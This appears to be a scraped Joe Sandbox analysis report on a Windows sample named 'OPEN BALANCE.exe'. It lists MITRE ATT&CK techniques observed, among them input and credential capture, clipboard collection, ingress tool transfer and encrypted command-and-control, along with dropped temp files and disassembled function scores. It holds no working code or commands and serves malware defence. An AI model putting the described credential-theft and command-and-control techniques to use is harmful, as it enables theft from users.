Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report OPEN BALANCE.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\51688324h

C:\Users\user\AppData\Local\Temp\autB109.tmp

C:\Users\user\AppData\Local\Temp\autB148.tmp

C:\Users\user\AppData\Local\Temp\fascinatress

C:\Users\user\AppData\Local\Temp\unjust

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Windows Analysis Report
OPEN BALANCE.exe

Function 008442DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 00843170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
timewindowregistryCOMMON

Function 008442A2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 61
COMMON

Function 00882BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 0088065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 0084344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00842B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 00842CD4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53
registrywindowclipboardCOMMON

Function 00878D45 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Function 014E2600 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00842C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 014E23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151
fileCOMMON

Function 008B2947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre